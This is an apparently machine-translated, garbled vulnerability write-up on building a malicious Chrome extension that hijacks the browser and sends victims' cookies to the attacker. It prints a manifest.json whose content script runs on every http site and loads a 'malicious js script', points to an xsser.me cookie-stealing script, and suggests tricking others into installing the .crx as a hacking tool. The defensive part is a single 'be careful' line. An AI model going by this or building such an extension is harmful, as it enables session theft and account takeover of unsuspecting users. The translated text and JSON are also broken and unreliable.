I have dug a bunch of XSS in the past. At first I thought it was quite interesting. Later I realized that I would submit the XSS in the future. Sorry, brother, I don't know what type it should be, you can check it out... This is just something that I came up with when I was bored. I don't know if I can pass it...
Chrome plug-in development uses malicious Chrome plug-in execution to hijack the entire browser. All websites that log on through the chrome browser will automatically send cookies. Before getting started, let's start with the basics of chrome plug-in development. Several files are required to develop a chrome plug-in. Main file manifest. json (similar to ThE configuration file) ThE manifest used this time is: {"name": "ThE WorLd", // name "version": "1.0", // version "manifest_version ": 2, // This must contain "icons": {"128": "smile.gif"}, // icon "content_scripts ": [// set the communication between javascript and the website {"matches": ["http: // */*"], // set the domain http that communicates with the plug-in js: // */* indicates any website "js": ["location. js "] // malicious js script}]," description ":" TEST ", // something with the same remarks" browser_action ": {// icon" default_icon ": {"19": "icon.gif", "38": "smile.gif"}, "default_title": "ThE WorLd", "default_popup ": "popup.html" // pop-up window} content_scripts is the key option. You can set the communication between the website and javascript. Here, we set any URL, if you just want to steal a cookie such as Weibo, you only need to set http://t.qq.com/ * That's all. We will use the xsser. me js script later. To achieve better performance, We Have To optimize popup.html. But here I will not do it. I will not beautify it... Two simple statements. <H2> WOOYUN The crx in the following is a lascivious one for others, saying, buddy, brother found a penetration artifact... and then she played GAME OVERSolution:
Be careful with this kind of things .....